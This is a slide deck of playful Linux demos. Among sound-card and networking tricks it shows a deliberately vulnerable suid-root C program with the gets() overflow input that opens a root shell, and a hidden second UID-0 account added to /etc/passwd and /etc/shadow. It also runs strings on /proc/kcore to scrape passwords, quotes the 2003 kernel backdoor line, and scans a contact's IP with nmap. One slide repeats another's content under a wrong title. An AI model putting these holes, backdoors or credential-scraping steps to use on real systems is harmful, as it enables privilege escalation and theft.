NAVIGATING THROUGH THIS PRESENTATION MATERIAL

  • this presentation is made using S5 presentation system
  • press page down to move to the next slide
  • press page up to move to the previous slide
  • press t to change to toggle from presentation mode to text mode
  • visit http://meyerweb.com/eric/tools/s5/ for more information
  • S5 uses XHTML( content) Javascripting (dynamic aspects) and CSS (layout)
  • Podium is similar presentation system that uses PHP instead of Javascripting




Fun with GNU/Linux - Play with Tux

Deepan Chakravarthy N

SpikeSource Software Pvt Ltd

codeshepherd AT yahoo DOT com

The Voice of Linux Kernel

This is to demostrate how /dev/audio is being used by mplayer, xine, xmms, or other audio players. These players just convert the mp3, avi and other audio file formats to raw audio file format and copy them to /dev/audio. To listen to how your kernel sounds just do as follows

  • $cp  /boot/vmlinuz*   /dev/audio
  • $cp  something.au   /dev/audio
  • $cp  something.wav   /dev/dsp
    •

    Click here to download some songs in raw audio format.

    A Hole in Computer Brain

    A sample program to gain root access!! (buffer overflow attack)
    #include<stdio.h>
    #include<string.h>
    #include<errno.h>
    #include<unistd.h>
    int main(){
      char command[50],data[10];
      strcpy(command,"/usr/bin/clear");
      gets(data);

      execlp(command,command,NULL);
      printf("%s\n",strerror(errno));
      return 1;
      }
         Compile and execute program (suid-root for the executable).
    $gcc thisprogram.c
    $sudo chown root a.out; sudo chmod u+s a.out;
    $./a.out
         Once you press enter the program will wait for user to enter some data. Guess what you should enter to make the program open a bash shell as root??

    "abcdefghijklmnop/bin/bash"
    "xxxxxxxxxxxxxxxx/path/to/command/" in more general sense, where x is any character.
     For more information google for "Smashing the stack for fun and profit"

    Mental Inside

    This is a computer that speaks to itself. If you have two ethernet cards in your computer then hunt for crossover cable and connect both. Assign ips for both the ethernet interface. Edit the routing table and turnoff the local routing so that you force all communications via the Eth. If you dont have two ethernet card then try connecting your USB to Eth.
    Crossover cables can be used to connect two computers directly, unlike normal cables which need a router or switch.

    #ifconfig lo down;
    #ping localhost //to check if lo is down
    #ifconfig eth0 192.168.11.1 netmask 255.255.255.0
    #ifconfig eth1 192.168.11.2 netmask 255.255.255.0
    #route add -net 192.168.11.2 netmask 255.255.255.0 gw 192.168.11.2 dev eth0
    #route add -net 192.168.11.1 netmask 255.255.255.0 gw 192.168.11.1 dev eth1
    #ping 192.168.11.1

    Computers in Love

    This is similar to last experiment. Here two computers speak to each other directly without a hub or a router. Connect two computers directly with a crossover cable. Assign IPs for both of them and route as follows.

    #ifconfig eth0 192.168.11.1 netmask 255.255.255.0 //in computer A
    #ifconfig eth0 192.168.11.2 netmask 255.255.255.0 //in computer B
    #route add -net 192.168.11.2 netmask 255.255.255.0 gw 192.168.11.2 dev eth0 //in computer A
    #route add -net 192.168.11.1 netmask 255.255.255.0 gw 192.168.11.1 dev eth0 //in computer B
    #ssh -l username 192.168.11.2 //in computer A

    Beaware of kcore

    This is to demonstrate the use strings on /proc/kcore. Kcore is a snapshort of your RAM. Strings is a program to extract all printable characters in a file. When applied to kcore it will extract all printable strings from your ram which might be your bank password, yahoo password, etc.

    #strings /proc/kcore > ~/str.txt

    Creating Pseudo root

    Create a pseudo root account in your machine. The pseudo root user name i choose is usdl. Open /etc/passwd file. Duplicate the line that corresponds to root user. Change the user name from root to usdl in the new line. Basically you will be adding a new line that looks like
    usdl:x:0:0:root:/root:/bin/bash
    After this open /etc/shadow and duplicate the line that corresponds to root. Basically add a line like
    usdl:$1$5C.UkdfjsdlfjsdbTBbkIeyMDxqzAO0:13196:0:99999:7:::
         Now the pseudo root user has the same password as root user. Use passwd command to change the pseudo root password.

    Kernel Backdoor

    Here is the most important part of an kernel backdoor entry attempted in 2003 November.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;
         Can you guess what is wrong??

    The if statement should be
    (current->uid == 0)
         and not
    (current->uid = 0)

    Find if your yahoo buddy is invisible

    This is applicable only to those people who are not behind a proxy server. Find the IP of your yahoo friend from his profile. Run nmap on that ip.
    #nmap ip
         If you find something like
    5101/tcp open admdog
         Then your friend is using yahoo. 5101 is the port used by yahoo messenger.

    http tunneling

    Well this is for people who are behind college or corporate firewall(blocks all ports !=80) and wanting to connect to outside world via ports other that 80.
    #hts clientip:22 80 //at home
    #htc 2323 serverip:80 //at colg
    #ssh localhost -p 2323 //at colg
         The ssh to localhost of client is received by htc at port 2323. htc converts this to http message and passes it to hts at server. hts on server receives this message at port 80 and removes the html tags and passes it to sshd. sshd receives at port 22. The reply from sshd goes back to client ssh exactly in the reverse manner.

    The DA VINCI CODE



    $echo -e "\107\116\125 \x4C\x69\x6E\x75\x78 \x69\x73 \x6D\x79 \x52\x65\x6C\x69\x67\x69\157\156\012\122\115\123 \151\163 \107\157\144\x0A\114\151\156\x75\x73 \124\157\162\166\141\154\x64\x73 \151\163 \x50\x72\x6F\x70\x68\x65\x74"
         Please find out what this message means.
    The message says
    Linux is my Religion
    RMS is god
    Linus Torvalds is prophet
    Other funny messages!!
    $echo -e "\x61\000\x00\000\x70\000\x72\000\x00\x69\x00\x00\x00\x6C\000\x00\x00 \000\x00\146\x00\000\x00\157\x00\000\x00\157\154\041\x21" //this message has been diluted with null
    $echo -e "\x61\x70\x72\x69\x6C \x66\x6F\x6F\x6C" //pure hex without null
    $echo -e "\141\160\162\151\154 \146\157\157\154" //pure octal without null

    Look at man ascii and man echo for more details. The first echo statement has too many NULLS ( \x00 or \000 ) to prevent the user from guessing the message

    Speak in Machine Language

    cat some binary file. It will spoil the bash prompt most probably.
    $cat /bin/true
    $tput reset
    To reset the terminal back to normal mode execute tput reset in the terminal.

    Jukebox

    Create a new runlevel say 7. So create a folder called rc7.d and put a shell script that will play songs. Name it as SXXmplayer. XX stands for two digit number that decides the sequence of execution of startup scripts in rc folder. Copy other S* scripts for rc.d folder which are essential for booting the system will all necessary resources to play music. Edit you grub and create one more entry that by default goes into runlevel 7.

    Double X Windows

    Here is the most important part of an kernel backdoor entry attempted in 2003 November.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;
         Can you guess what is wrong??

    The Thinking Program

    think(){think();} void main(){think();}
    [any material that should appear in print but not on the slide]